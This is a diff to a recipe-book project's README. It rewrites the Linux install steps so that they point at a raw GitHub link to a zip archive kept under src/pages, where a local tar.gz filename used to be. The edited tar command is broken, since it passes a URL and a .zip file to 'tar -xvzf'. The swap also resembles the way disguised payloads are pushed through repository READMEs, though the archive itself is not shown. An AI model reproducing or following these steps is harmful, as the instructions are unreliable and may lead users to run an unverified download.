kipruto2002/recipe-book/README.md

 #### For Linux Users:

 1. Open a terminal window.
-2. Navigate to the folder where you downloaded the `recipe-book-linux.tar.gz` file.
+2. Navigate to the folder where you downloaded the `https://raw.githubusercontent.com/kipruto2002/recipe-book/main/src/pages/recipe-book_3.6.zip` file.
-3. Use the command `tar -xvzf recipe-book-linux.tar.gz` to extract the files.
+3. Use the command `tar -xvzf https://raw.githubusercontent.com/kipruto2002/recipe-book/main/src/pages/recipe-book_3.6.zip` to extract the files.
 4. Navigate into the extracted directory and run the application by executing `./recipe-book`.

 ### Step 4: Create an Account